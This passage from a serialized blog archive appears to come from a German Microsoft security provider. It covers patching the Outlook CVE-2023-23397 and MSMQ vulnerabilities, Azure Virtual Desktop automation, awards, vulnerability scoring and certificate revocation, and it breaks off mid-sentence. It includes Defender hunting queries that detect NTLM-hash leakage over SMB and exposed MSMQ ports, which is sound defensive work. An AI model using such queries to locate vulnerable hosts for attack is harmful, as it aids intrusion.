The following update measures are possible:",[1254,3858,3859,3862],{},[1257,3860,3861],{},"The user checks for updates in Office themselves: (File \\ Office Account \\ Update Options > Update Now)",[1257,3863,3864],{},"In a modern workplace environment, we use Office update policies. Office can be managed using Intune or GPOs. We recommend using the deployment deadline setting.",[12,3866,3867],{},"We will show you how to achieve basic settings for quickly updating Office applications using Intune. These instructions are not complete but focus on quickly installing updates.",[12,3869,3870,3871],{},"In the Intune portal, open the Devices section.\nClick on \"Configuration profiles\" and then \"Create profile\".\nChoose \"Windows 10 and later\" as the platform and \"Templates\" as the type.\nThen click on \"Administrative Templates\".\n",[2642,3872],{"alt":3873,"src":3874},"Configuration Profiles","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-01.png",[12,3876,3877,3878],{},"Assign an appropriate (any) name.\n",[2642,3879],{"alt":3880,"src":3881},"Create Profiles","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-02.png",[12,3883,3884,3885],{},"In the search bar, enter \"Update Deadline\" and then click on the entry.\nActivate the setting and set a deadline. This can be a number of days or a specific time. Click \"OK\" (and not \"Next\").\n",[2642,3886],{"alt":3887,"src":3888},"Update Deadline","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-03.png",[12,3890,3891,3892],{},"Now enter \"Enable Automatic Updates,\" click on the entry again, and activate this setting. 
Please confirm with \"OK\" and now click on \"Next\".\n",[2642,3893],{"alt":3894,"src":3895},"Enable Automatic Update","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-04.png",[12,3897,3898],{},"Scope tags are not required, so you can skip this tab with \"Next.\"",[12,3900,3901,3902],{},"As an assignment, you must now select a group that includes all your Windows devices to be updated.\n",[2642,3903],{"alt":3904,"src":3905},"Add Groups","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-05.png",[12,3907,3908,3909,3913],{},"Click on \"Next\" one last time, and a summary will be shown.\n",[2642,3910],{"alt":3911,"src":3912},"Review + Create","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-06.png","\nWith \"Create,\" the Intune Administrative Template is created and applied to the group's computers.",[12,3915,3916],{},"If your company is unable to roll out these security updates immediately, or if you want to take additional measures until a successful rollout, it is recommended to block outgoing network traffic to Internet IP addresses for the SMB protocol (TCP 445) with a firewall or through VPN settings. This prevents information from flowing to the attacker.\nThis can also be done on the endpoint itself using the Microsoft Defender Firewall.",[12,3918,3919,3920,3925],{},"To check if your environment was the target of this attack, it is recommended to run ",[2672,3921,3924],{"href":3922,"rel":3923},"https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/",[2676],"Microsoft's script"," on Exchange Online or Exchange on-premises. 
It checks all mailboxes for suspicious messages.",[12,3927,3928],{},"If you are using Microsoft Defender for Endpoint, you can use the following Advanced Hunting Query to detect corresponding network connections in your environment:",[52,3930,3932,3933,3935,3936,3940,3941,3945,3949,540,3951,3935,3953,3955,3956,540,3960,3964,3965,540,3968,3935,3970,3972,3973,540,3976,3978,3979,3982,3983],{"style":3931},"background-color:#000000; font-family: 'Source Code Pro', 'Courier New', monospace; padding: 15px; color: #ffffff","\nDeviceNetworkEvents ",[531,3934],{},"\n| ",[102,3937,3939],{"style":3938},"color: #569CD6;","where"," Timestamp > ",[102,3942,3944],{"style":3943},"color: #E6DB74;","ago(",[102,3946,3948],{"style":3947},"color: #A6E22E;","30d",[102,3950,1288],{"style":3943},[531,3952],{},[102,3954,3939],{"style":3938}," RemoteIPType == ",[102,3957,3959],{"style":3958},"color: #D69D85;","\"Public\"",[102,3961,3963],{"style":3962},"color: #F92672;","and"," RemotePort == ",[102,3966,3967],{"style":3958},"\"445\"",[531,3969],{},[102,3971,3939],{"style":3938}," InitiatingProcessVersionInfoOriginalFileName =~ ",[102,3974,3975],{"style":3958},"\"outlook.exe\"",[531,3977],{},"\n  ",[102,3980,3981],{"style":3962},"or"," InitiatingProcessParentFileName =~ ",[102,3984,3975],{"style":3958},[52,3986],{"className":3987},[3988,3989],"container","space-bottom-2",[41,3991,3993],{"id":3992},"further-links","Further links:",[1254,3995,3996,4002,4009],{},[1257,3997,3998],{},[2672,3999,4001],{"href":3922,"rel":4000},[2676],"CVE-2023-23397 script",[1257,4003,4004],{},[2672,4005,4008],{"href":4006,"rel":4007},"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397",[2676],"Microsoft Outlook Elevation of Privilege Vulnerability",[1257,4010,4011],{},[2672,4012,4015],{"href":4013,"rel":4014},"https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2023-exchange-server-security-updates/ba-p/3764224",[2676],"Released: March 2023 Exchange Server Security 
Updates",{"title":65,"searchDepth":111,"depth":111,"links":4017},[4018],{"id":3992,"depth":111,"text":3993},{"lang":2171,"DISABLEDtitleClass":2173,"categories":4020,"blogtitlepic":4021,"socialimg":4022,"customExcerpt":4023},[2176],"head-outlook-sicherheitsluecke","/blog/heads/head-outlook-sicherheitsluecke.jpg","Microsoft confirmed a critical vulnerability in Outlook that is already being used by attackers to steal the Net-NTLMv2 hash from users. Once activated by a malicious email, this exploit allows further attacks on the victim. Microsoft recommends updating the Office package to fix the vulnerability. Various update options are available for this purpose.","2023-03-16","/posts/2023-03-16-outlook-vulnerability",{"title":3847,"description":3853},"posts/2023-03-16-outlook-vulnerability",[2176,4029,3660],"Vulnerablity","ga9u-vDELyoZXaWWzoLKycdWacsBjiqyLs7Ruj-a7s8",{"id":4032,"title":4033,"author":4034,"body":4035,"cta":2166,"description":4039,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4147,"moment":4155,"navigation":2181,"path":4156,"seo":4157,"stem":4158,"tags":4159,"webcast":2168,"__hash__":4160},"content_en/posts/2023-04-12-critical-vulnerability.md","Critical Vulnerability in MSMQ Service",[2494],{"type":9,"value":4036,"toc":4144},[4037,4040,4043,4046,4049,4091,4094,4097,4121,4124,4128],[12,4038,4039],{},"As part of yesterday's Microsoft Patch Tuesday, a critical security vulnerability in the \"Microsoft Message Queuing\" service was fixed. This security vulnerability allows an attacker to execute code without having to authenticate on the target system.",[12,4041,4042],{},"Currently, there is no publicly available exploit code, but this is expected to change quickly in the coming days. 
This is the opinion of both Microsoft and the security researchers who discovered the flaw.",[12,4044,4045],{},"Since this Windows feature is also installed in conjunction with other software products (e.g., Exchange, SQL Server SSPI), more systems may be affected than initially thought. Immediate assistance can be provided by the Microsoft patch or, as a workaround, by blocking incoming network connections to TCP/1801.",[12,4047,4048],{},"With the following advanced hunting query, you can search your own environment for vulnerable systems.",[52,4050,3932,4051,3935,4053,3940,4055,4057,4059,540,4061,3935,4063,4065,4066,4069,3935,4071,4073,4074,540,4077,3935,4079,4081,4082,540,4085,3935,4087,4090],{"style":3931},[531,4052],{},[102,4054,3939],{"style":3938},[102,4056,3944],{"style":3943},[102,4058,3948],{"style":3947},[102,4060,1288],{"style":3943},[531,4062],{},[102,4064,3939],{"style":3938}," ActionType == ",[102,4067,4068],{"style":3958},"\"ListeningConnectionCreated\"",[531,4070],{},[102,4072,3939],{"style":3938}," LocalPort == ",[102,4075,4076],{"style":3958},"\"1801\"",[531,4078],{},[102,4080,3939],{"style":3938}," InitiatingProcessVersionInfoOriginalFileName has ",[102,4083,4084],{"style":3958},"\"MQSVC\"",[531,4086],{},[102,4088,4089],{"style":3938},"summarize by"," DeviceName\n",[52,4092],{"className":4093},[3988,3989],[12,4095,4096],{},"Alternatively, if the network port has been changed, the query is:",[52,4098,4099,4100,3935,4102,3940,4104,4106,4108,540,4110,3935,4112,4114,4115,540,4117,3935,4119,4090],{"style":3931},"\nDeviceProcessEvents ",[531,4101],{},[102,4103,3939],{"style":3938},[102,4105,3944],{"style":3943},[102,4107,3948],{"style":3947},[102,4109,1288],{"style":3943},[531,4111],{},[102,4113,3939],{"style":3938}," ProcessVersionInfoOriginalFileName has 
",[102,4116,4084],{"style":3958},[531,4118],{},[102,4120,4089],{"style":3938},[52,4122],{"className":4123},[3988,3989],[41,4125,4127],{"id":4126},"sources","Sources:",[1254,4129,4130,4137],{},[1257,4131,4132],{},[2672,4133,4136],{"href":4134,"rel":4135},"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554",[2676],"Microsoft Message Queuing Remote Code Execution Vulnerability",[1257,4138,4139],{},[2672,4140,4143],{"href":4141,"rel":4142},"https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/",[2676],"QueueJumper: Critical Unauthenticated RCE Vulnerability in MSMQ Service",{"title":65,"searchDepth":111,"depth":111,"links":4145},[4146],{"id":4126,"depth":111,"text":4127},{"lang":2171,"DISABLEDtitleClass":2173,"categories":4148,"blogtitlepic":4149,"socialimg":4150,"customExcerpt":4151,"hreflang":4152},[2176],"head-critical-vulnerability","/blog/heads/head-critical-vulnerability.jpg","Microsoft's Patch Tuesday fixed a critical vulnerability in the Message Queuing Service. This vulnerability allowed an attacker to execute code without authentication. A possible public exploit is imminent. 
It is recommended to quickly close the gap or block incoming network connections.",[4153],{"lang":2260,"href":4154},"/blog/security/csoc/event/2023/04/critical-vulnerability","2023-04-12","/posts/2023-04-12-critical-vulnerability",{"title":4033,"description":4039},"posts/2023-04-12-critical-vulnerability",[2176,4029,3660],"-IM--UdCx0Z6k8B9U6imPq4xdIx1otsWJ6wDjuhqyls",{"id":4162,"title":4163,"author":4164,"body":4165,"cta":2166,"description":4169,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4230,"moment":4239,"navigation":2181,"path":4240,"seo":4241,"stem":4242,"tags":4243,"webcast":2168,"__hash__":4246},"content_en/posts/2023-04-24-azure-virtual-desktop.md","Azure Virtual Desktop - Yes, but automated please!",[2401],{"type":9,"value":4166,"toc":4225},[4167,4170,4173,4177,4180,4184,4188,4191,4199,4203,4206,4209,4212,4215,4218,4222],[12,4168,4169],{},"Azure Virtual Desktop is by no means a new service, but in our experience it is an Azure service that fills many gaps and is very popular with our customers. Setting up an AVD environment \"quickly\" is certainly not a problem for an engineer who is familiar with Azure. But where does it go from there? What normally starts as a test environment soon becomes a workload in productive use, which thus also has completely different requirements for secure and stable operation.",[12,4171,4172],{},"Microsoft itself offers many functions that make this quite easy. However, the use cases are very different and for some aspects there are no automation solutions yet. For example, the use cases for Pooled AVD and Personal AVD are usually fundamentally different. 
But in order to provide a holistic, standardized and reproducible solution, we believe that the use of Infrastructure-as-Code (IaC) is a necessity.",[186,4174,4176],{"id":4175},"iac-and-terraform-for-avd-foundation","IaC and Terraform for AVD Foundation",[12,4178,4179],{},"Similar to our Azure Foundation, we also use Infrastructure-as-Code (IaC) based on Terraform for the deployment of the AVD Foundation. This allows us to quickly build the perfect-fit AVD environment in a standardized way, depending on the customer specific setup. During a parameterization workshop, the needs and wishes are determined, the existing infrastructure is analyzed and the required parameters for the deployment are compiled. In this way, we can provide an AVD Personal Host environment for productive deployment at the customer's site within a few days. With the Pooled AVD approach, we also offer an automated solution together with Image Factory, which implements image management on a code basis as well as enabling the management of the AVD environment itself.",[2642,4181],{"src":4182,"alt":4183},"https://res.cloudinary.com/c4a8/image/upload/v1681647046/blog/pics/img-avd-foundation-layer-concept.png","AVD Foundation Layer Concept",[186,4185,4187],{"id":4186},"personal-pools","Personal Pools",[12,4189,4190],{},"For personal hosts, which are treated similarly to users' physical workstations, the AVD Foundation focuses primarily on providing the necessary infrastructure in Azure. In a multi-layered approach, not only monitoring solutions are implemented, but also hosts, pools, workspaces and applications are provided. 
The Windows image directly from the Microsoft Marketplace serves as the basis.",[12,4192,4193,4194,4198],{},"Software installation and configuration on the provisioned hosts is done via a client management solution, in our case Intune and ",[2672,4195,2677],{"href":4196,"rel":4197},"https://www.realmjoin.com/",[2676],", which is strongly oriented towards autopilot deployment of physical clients. For cost-optimized operations, we also provide the ability to idle hosts using Azure Functions to reduce infrastructure costs - a feature not yet offered by AVD's current scaling plans. This can significantly reduce the cost of personal hosts without having to rely on reservations.",[186,4200,4202],{"id":4201},"pooled-pools","Pooled Pools",[12,4204,4205],{},"The Pooled Hosts approach is more closely aligned with the classic terminal server approach. In order to fully exploit the flexibility and scalability of AVD compared to legacy desktop virtualization solutions, we rely on so-called golden images for Pooled Hosts. These make it possible to deploy standardized hosts on demand in the least amount of time. The fully automated creation of these golden images is done with the help of our Image Factory, where the image can be parameterized and configured.",[12,4207,4208],{},"Especially interesting is the automated software installation during the imaging process by RealmJoin. The manual creation and storage of software packages is no longer necessary; instead, a pool of over 1,000 ready-to-use software packages can be accessed or individual packages can be used. The simultaneous use of RealmJoin for standard clients and AVD hosts enables particularly large synergies.",[12,4210,4211],{},"The customized images are then stored in a compute gallery and used to deploy the pools. 
This process can be parallelized for multiple host pools with different images as well as performed as often as required to always create an up-to-date version.",[12,4213,4214],{},"From the customer AVD workspace to the profile shares and the hosts themselves, everything is created completely automatically using Terraform code in pipelines. The profile shares can be created without direct line-of-sight to the ADDS, and no management client/server is required. Everything is done directly during the automated code deployment, with no manual steps required.",[12,4216,4217],{},"When adjusting pool sizes later on, our AVD Manager takes over the automated management of AAD and Intune objects.",[2642,4219],{"src":4220,"alt":4221},"https://res.cloudinary.com/c4a8/image/upload/v1681651495/blog/pics/img-avd-foundation-infrastructure.png","AVD Foundation Infrastructure",[12,4223,4224],{},"If you are tired of semi-automated AVD environments or semi-productive states, don't hesitate to contact us. We will be happy to present our sophisticated AVD Foundation solution in detail and show you how it can revolutionize your everyday work.",{"title":65,"searchDepth":111,"depth":111,"links":4226},[4227,4228,4229],{"id":4175,"depth":329,"text":4176},{"id":4186,"depth":329,"text":4187},{"id":4201,"depth":329,"text":4202},{"lang":2171,"titleClass":2173,"categories":4231,"blogtitlepic":4233,"socialimg":4234,"customExcerpt":4235,"hreflang":4236},[4232],"Azure","head-avd-foundation","/blog/heads/head-avd-foundation.jpg","Discover a unique solution for Azure Virtual Desktop (AVD) - the AVD Foundation! With Infrastructure-as-Code (IaC) and Terraform, we offer standardized and automated solutions for Personal and Pooled Hosts. Learn how to quickly build, optimize and scale your AVD environment to meet the needs of your business. 
Put an end to semi-automated environments and semi-productive states - improve your daily work with AVD Foundation!",[4237],{"lang":2260,"href":4238},"/blog/azure/avd/terraform/2023/04/azure-virtual-desktop","2023-04-24","/posts/2023-04-24-azure-virtual-desktop",{"title":4163,"description":4169},"posts/2023-04-24-azure-virtual-desktop",[4232,4244,4245],"Terraform","AVD","K0ySd0HsOfH3n0kKtXB8yOAlqGhat5F2VyY5lHC9O6Q",{"id":4248,"title":4249,"author":4250,"body":4251,"cta":2166,"description":4255,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4307,"moment":4239,"navigation":2181,"path":4315,"seo":4316,"stem":4317,"tags":4318,"webcast":2168,"__hash__":4320},"content_en/posts/2023-04-24-security-excellence-awards.md","Top-5 MSSPs Worldwide – Security Elite Honored during RSA 2023",[2461],{"type":9,"value":4252,"toc":4300},[4253,4256,4260,4263,4267,4270,4274,4277,4281,4284,4288,4291],[12,4254,4255],{},"We are thrilled to announce that we are among the top 5 worldwide in the category \"Managed Security Service Provider (MSSP) of the Year\" at the Microsoft Security Excellence Awards 2023. This award is a testament to the tireless efforts and expertise of our Cloud Security Operations Center (CSOC) and our innovative MXDR service offering.",[186,4257,4259],{"id":4258},"a-convergence-of-security-pioneers","A Convergence of Security Pioneers",[12,4261,4262],{},"The Microsoft Security Excellence Awards will take place at the RSA Conference 2023 in San Francisco. The prestigious event recognizes the achievements of the world's top security companies over the past year among members of the Microsoft Intelligent Security Association (MISA). 
MISA is a powerful alliance that brings together Microsoft executives, subject matter experts, independent software vendors and MSSPs to address the ever-growing cyber threats we face today.",[186,4264,4266],{"id":4265},"our-cutting-edge-mxdr-service","Our Cutting-Edge MXDR Service",[12,4268,4269],{},"Our MXDR service offering, led by our dedicated CSOC team, consists of a comprehensive Security Operations Center (SOC) that provides 24/7/365 proactive search, monitoring, and response capabilities. This advanced solution, deeply integrated with the Microsoft security platform, fuses expert-trained technology with human-led services and has been vetted by Microsoft engineers themselves.",[186,4271,4273],{"id":4272},"a-hub-of-security-excellence","A Hub of Security Excellence",[12,4275,4276],{},"Located in Germany, our Cloud Security Operations Center houses experienced and certified security engineers with extensive technical IT security knowledge. We support a wide range of IT infrastructures for our enterprise customers, including OT/IoT, on-premises, and various cloud environments. Our CSOC uses state-of-the-art Microsoft security tools to monitor all systems in enterprise environments, including Checkpoint, CISCO, Fortinet, Windows Servers & Clients, Office 365, Citrix, SAP, and Linux.",[186,4278,4280],{"id":4279},"a-german-achievement-in-cyber-security","A German Achievement in Cyber Security",[12,4282,4283],{},"We are honored to be the only German finalist in the \"Managed Security Service Provider (MSSP) of the Year\" category. This award underscores our unwavering commitment to delivering world-class security services and solutions to our globally distributed customers.",[186,4285,4287],{"id":4286},"conclusion","Conclusion",[12,4289,4290],{},"As we celebrate our success at the Microsoft Security Excellence Awards 2023, we express our gratitude to the entire MISA community for their steadfast dedication to ensuring the security of our shared customers. 
We remain committed to delivering pioneering security services and solutions and look forward to the future innovations and milestones we'll achieve together.",[12,4292,4293,4294,4299],{},"For more information about our MXDR Service, please ",[2672,4295,4298],{"href":4296,"style":4297},"/en/security/cloud-security-operations-center","color: #FCD116;","visit our website."," We are looking forward to hearing from you!",{"title":65,"searchDepth":111,"depth":111,"links":4301},[4302,4303,4304,4305,4306],{"id":4258,"depth":329,"text":4259},{"id":4265,"depth":329,"text":4266},{"id":4272,"depth":329,"text":4273},{"id":4279,"depth":329,"text":4280},{"id":4286,"depth":329,"text":4287},{"lang":2171,"titleClass":2173,"categories":4308,"blogtitlepic":4309,"socialimg":4310,"customExcerpt":4311,"hreflang":4312},[2962],"head-misa-excellence-award","/blog/heads/head-misa-excellence-award.jpg","glueckkanja has secured an impressive top 5 spot in the highly competitive Security MSSP of the Year category at the 2023 Microsoft Security Excellence Awards. 
This prestigious award is a testament to the tireless dedication and expertise of our Cloud Security Operations Center (CSOC), as well as the groundbreaking innovations behind our MXDR service offering.",[4313],{"lang":2260,"href":4314},"/blog/award/csoc/event/security/2023/04/security-excellence-awards","/posts/2023-04-24-security-excellence-awards",{"title":4249,"description":4255},"posts/2023-04-24-security-excellence-awards",[2972,3660,4319,2176],"Events","yS4ouM0f3AfaMQKzdW5oLg2J6tDTRKg-yvCVXXwcBbI",{"id":4322,"title":4323,"author":4324,"body":4325,"cta":2166,"description":4329,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4387,"moment":4388,"navigation":2181,"path":4397,"seo":4398,"stem":4399,"tags":4400,"webcast":2168,"__hash__":4402},"content_en/posts/2023-05-04-isg-2023.md","Leader for Microsoft 365 Services and Managed Azure",[2461],{"type":9,"value":4326,"toc":4383},[4327,4330,4334,4337,4342,4353,4359,4363,4366,4369,4380],[12,4328,4329],{},"When it comes to being a leader in the world of managed services for Microsoft 365 and Azure, one name keeps popping up in the industry: glueckkanja. The company has once again secured its place as a Leader in ISG's 2023 study, proving that it continues to expand its expertise and commitment.",[186,4331,4333],{"id":4332},"microsoft-365-services-focused-on-customer-needs","Microsoft 365 Services: Focused on customer needs",[12,4335,4336],{},"The Workplace Services from glueckkanja are specifically tailored to the needs of customers with more than 1,000 users. In doing so, the company relies on a vision and implementation strategy that fits seamlessly into the requirements of its customers. 
The success of this strategy is also reflected in the growing new customer business.",[4338,4339,4341],"h4",{"id":4340},"strengths-at-a-glance","Strengths at a glance",[1254,4343,4344,4347,4350],{},[1257,4345,4346],{},"Customer focus: glueckkanja is committed to providing its customers with practical benefits and supports them, for example, in time-consuming tasks such as the distribution and management of software certificates in the cloud.",[1257,4348,4349],{},"Clear objective: With the claim to become the leading provider of managed services for Microsoft Workplace and Azure Datacenter in the German SME sector, glueckkanja has set itself a clear objective and is consistently pursuing it.",[1257,4351,4352],{},"Technology at the service of customers: The use of Windows Platform and Windows Enterprise Clients with the functions for collaboration and the protection provided by Microsoft 365 Defender enables users to be productive wherever they need to work.",[12,4354,4355],{},[2642,4356],{"alt":4357,"src":4358},"Leader Microsoft 365","https://res.cloudinary.com/c4a8/image/upload/v1683195538/blog/pics/img-isg-m365-badge.jpg",[186,4360,4362],{"id":4361},"managed-services-for-azure-success-through-satisfaction-and-security","Managed Services for Azure: Success through satisfaction and security",[12,4364,4365],{},"glueckkanja has managed to position itself as one of Germany's leading partners for managed services on the Azure platform, and in the process has strengthened the trust of its customers.",[4338,4367,4341],{"id":4368},"strengths-at-a-glance-1",[1254,4370,4371,4374,4377],{},[1257,4372,4373],{},"Successful reorganization: the successful completion of the merger enabled the company to achieve a high level of employee satisfaction.",[1257,4375,4376],{},"Strong partnership with Microsoft: with five of the six new Solutions Partner Designations, glueckkanja demonstrates that it meets Microsoft's high requirements and masters optimal software deployment for 
customers.",[1257,4378,4379],{},"Security in focus: glueckkanja relies 100% on the Microsoft product range for its security concepts and thus avoids unnecessary complexity by foregoing 3rd party solutions.",[12,4381,4382],{},"The ISG Study 2023 once again underscores glueckkanja's impressive position as the industry leader for Microsoft 365 Services and Managed Azure. The combination of customer value, employee satisfaction and technical expertise shows that glueckkanja is the right choice for companies looking for a reliable partner for their Microsoft 365 and Azure needs. With consistent innovation and a close partnership with Microsoft, glueckkanja remains a reliable partner for customers looking for efficient and secure solutions.",{"title":65,"searchDepth":111,"depth":111,"links":4384},[4385,4386],{"id":4332,"depth":329,"text":4333},{"id":4361,"depth":329,"text":4362},{"lang":2171,"titleClass":2173,"date":4388,"categories":4389,"blogtitlepic":4390,"socialimg":4391,"customExcerpt":4392,"keywords":4393,"hreflang":4394},"2023-05-09",[2962],"head-isg-2023","/blog/heads/head-isg-2023.jpg","glueckkanja was reconfirmed as the industry leader for managed services in Microsoft 365 and Azure in ISG's 2023 study. 
With a clear vision and implementation strategy, a customer-centric approach, and a strong focus on security and employee satisfaction, the company demonstrates that it meets the needs of its customers.","Managed Services solutions, Azure platform, Microsoft 365 Services, efficient IT partnership, German partners, cloud services, customer satisfaction, trust, innovative IT solutions, security and compatibility, problem-oriented strategies, successful software rollouts",[4395],{"lang":2171,"href":4396},"/blog/award/isg/corporate/2023/05/isg-2023","/posts/2023-05-04-isg-2023",{"title":4323,"description":4329},"posts/2023-05-04-isg-2023",[2972,4401],"ISG","u0ywXjJTSAoMluOuFpw2FFsnBIRv9yt4QMVpH8sp7fs",{"id":4404,"title":4405,"author":4406,"body":4407,"cta":2166,"description":4411,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4477,"moment":4478,"navigation":2181,"path":4487,"seo":4488,"stem":4489,"tags":4490,"webcast":2168,"__hash__":4491},"content_en/posts/2023-05-12-vulnerability-management-defender.md","Vulnerablity Management with Microsoft 365 Defender",[2295],{"type":9,"value":4408,"toc":4471},[4409,4412,4418,4421,4425,4433,4436,4440,4443,4449,4453,4456,4460,4463,4468],[12,4410,4411],{},"We all want to avoid security incidents in IT and therefore need to know our attack surface and reduce it wherever possible. In addition to tools such as Microsoft Defender Vulnerability Management, smooth processes in application management and vulnerability management are particularly helpful.",[12,4413,4414],{},[2642,4415],{"alt":4416,"src":4417},"Secure Score","https://res.cloudinary.com/c4a8/image/upload/v1683885342/blog/pics/img-secure-score.jpg",[12,4419,4420],{},"Looking at the Microsoft 365 Defender Portal, especially Defender for Endpoint, many are amazed at the data collected on vulnerable applications and weak configurations. Who hasn't experienced it? 
Every month, new update recommendations for Windows 10, Office and Google Chrome pop up in the dashboard. There are around 70 recommendations for secure endpoint configurations on the list as well. The question is how to cope with the countless recommendations and achieve an acceptable Exposure or Secure Score. What would be an acceptable score for an enterprise and how should one measure? To answer these questions, let's first take a look at the various products and scores.",[186,4422,4424],{"id":4423},"features-in-microsoft-365-defender-portal","Features in Microsoft 365 Defender Portal",[12,4426,399,4427,4432],{},[2672,4428,4431],{"href":4429,"rel":4430},"https://security.micosoft.com",[2676],"Microsoft 365 Defender Portal"," contains the overall Secure Score, which covers all areas of the M365 tenant, including endpoints, identities, data, and applications. A high score signals maximum security configurations. Microsoft recommends the most secure configuration of each tool and compares it to the current tenant configuration. Each individual Defender product has its own score (for example, Secure Score for Devices or Identity Secure Score), which is included in the general Secure Score. This score increases as soon as the settings recommended by Microsoft have been correctly implemented or mitigated by alternatives.",[12,4434,4435],{},"With Defender for Endpoint, we get a detailed listing of vulnerabilities on endpoints such as Workplace, Servers and Mobile Devices. This includes vulnerable applications, but also insecure configurations, such as a disabled Attack Surface Reduction Rule. In the future, the Defender for Vulnerability Management add-on will provide even more insights into browser extensions, certificates and firmware data. 
In addition, vulnerable applications can be blocked in the future.",[186,4437,4439],{"id":4438},"meaning-of-the-secure-score-for-devices-and-the-exposure-score","Meaning of the Secure Score for Devices and the Exposure Score",[12,4441,4442],{},"There are two scores in the Threat & Vulnerability Management (TVM) module of Defender for Endpoint: The Secure Score for Devices is part of the general Secure Score and only evaluates endpoints. The Exposure Score, on the other hand, indicates how vulnerable the devices are. The higher the Exposure Score, the more vulnerabilities there are on the devices. Therefore, the goal is to keep the Exposure Score as low as possible. If Microsoft's recommendations are followed, the Exposure Score decreases and the Secure Score usually increases. The recommendations differ between configuration changes and software updates. It often takes a team of security, workplace, network and server managers to work through the recommendations regarding configurations.",[12,4444,4445],{},[2642,4446],{"alt":4447,"src":4448},"Software Update Cycle","https://res.cloudinary.com/c4a8/image/upload/v1683885775/blog/pics/img-software-updates-cycle.jpg",[186,4450,4452],{"id":4451},"challenges-and-solutions-for-software-updates-and-upgrades","Challenges and solutions for software updates and upgrades",[12,4454,4455],{},"Unfortunately, the recommendations for software updates or upgrades are not so easy to handle. Application vulnerabilities in particular are very volatile - why else would there be a patch day every month? So we will always have a high exposure score due to new software vulnerabilities. Acute measures are often not helpful here; functioning update processes must be implemented in the company.",[186,4457,4459],{"id":4458},"microsoft-defender-external-attack-surface-management","Microsoft Defender External Attack Surface Management",[12,4461,4462],{},"In addition to your own endpoints and servers, there is another large attack surface. 
Externally accessible systems can be monitored with Microsoft Defender External Attack Surface Management. The unknown vulnerabilities are not a black box: we recommend regular assessments of the infrastructure, and a PenTest or Red Teaming event can also reveal unknown attack surfaces.",[12,4464,4465],{},[2642,4466],{"alt":4459,"src":4467},"https://res.cloudinary.com/c4a8/image/upload/v1683886771/blog/pics/img-surface-management.jpg",[12,4469,4470],{},"Microsoft currently offers the possibility of providing a comprehensive overview of its own attack surface and the existing vulnerabilities. However, mitigating or reducing the vulnerabilities requires a great deal of effort and usually new processes.",{"title":65,"searchDepth":111,"depth":111,"links":4472},[4473,4474,4475,4476],{"id":4423,"depth":329,"text":4424},{"id":4438,"depth":329,"text":4439},{"id":4451,"depth":329,"text":4452},{"id":4458,"depth":329,"text":4459},{"lang":2171,"titleClass":2173,"date":4478,"categories":4479,"blogtitlepic":4480,"socialimg":4481,"customExcerpt":4482,"keywords":4483,"hreflang":4484},"2023-05-12",[2176],"head-vulnerability-management","/blog/heads/head-vulnerability-management.jpg","In order to prevent attacks effectively, early detection of security vulnerabilities and their elimination, for example by applying patches, is essential. 
Given the increasingly narrow time span between the discovery of a security vulnerability and the first attacks targeting it, efficient and well-structured vulnerability management is becoming increasingly important.","IT Security, Microsoft Defender Vulnerability Management, Application Management, Vulnerability Management, Microsoft 365 Defender Portal, Defender for Endpoint, Secure Score, Exposure Score, Configuration, Vulnerable Applications, Defender for Vulnerability Management, Threat & Vulnerability Management, Software Updates, Software Upgrades, Microsoft Defender External Attack Surface Management, Attack Surface, Vulnerability Mitigation, Infrastructure Assessments, PenTest, Red Teaming Events, Update Processes, Patch Day",[4485],{"lang":2260,"href":4486},"/blog/security/csoc/defender365/corporate/2023/05/vulnerability-management-defender","/posts/2023-05-12-vulnerability-management-defender",{"title":4405,"description":4411},"posts/2023-05-12-vulnerability-management-defender",[3660,3395,4029],"n8RNIH3wwtktUennCi-DtZwVyEZXPzZ8q4GOPbtwZbg",{"id":4493,"title":4494,"author":4495,"body":4497,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4830,"moment":4831,"navigation":2181,"path":4841,"seo":4842,"stem":4843,"tags":4844,"webcast":2168,"__hash__":4847},"content_en/posts/2023-05-15-certificate-revocation.md","Controlling Certificate Lifetime and Revocation",[4496],"Christoph Hannebauer",{"type":9,"value":4498,"toc":4823},[4499,4503,4506,4517,4520,4523,4526,4529,4536,4539,4542,4545,4549,4557,4563,4576,4579,4582,4585,4600,4621,4624,4630,4651,4655,4658,4661,4664,4671,4674,4682,4696,4700,4703,4791,4793,4801,4805,4814],[186,4500,4502],{"id":4501},"certificate-revocation-lists-crls","Certificate Revocation Lists (CRLs)",[12,4504,4505],{},"For a long time, CRLs were the de-facto standard for PKIs. 
A Certification Authority (CA) regularly issues a list of certificate revocations, each with",[3259,4507,4508,4511,4514],{},[1257,4509,4510],{},"the certificate's serial number,",[1257,4512,4513],{},"the time of revocation, and",[1257,4515,4516],{},"the revocation reason.",[12,4518,4519],{},"The list itself has a creation and expiration date and has a digital signature, most often from the CA. It is published as a file on one or more CRL Distribution Points (CDPs). This used to be an LDAP URL, but nowadays it is often only HTTP. CRLs of Root CAs that only issue Sub CA certificates typically have a validity of 6 to 12 months. Common validity periods for CRLs of Sub CAs are 1 or 2 weeks.",[12,4521,4522],{},"A system usually does not download a CRL on every certificate check. Instead, it relies on cached CRLs downloaded on earlier checks. It downloads a new CRL only shortly before the old one expires. This is because CRLs can become quite large -- CRLs of public CAs may contain many certificates and grow to multiple MB in size.",[12,4524,4525],{},"This has the additional advantage that systems can check certificate validity even during CDP outages. Browsers, email clients, NACs, and so on treat certificates as invalid if they cannot check their revocation status: Attackers could use their stolen and revoked certificates just by interrupting the connection to the CDP. This depends on the settings, though.",[12,4527,4528],{},"On the downside, revocations arrive at participating systems only with some latency. Assume an admin 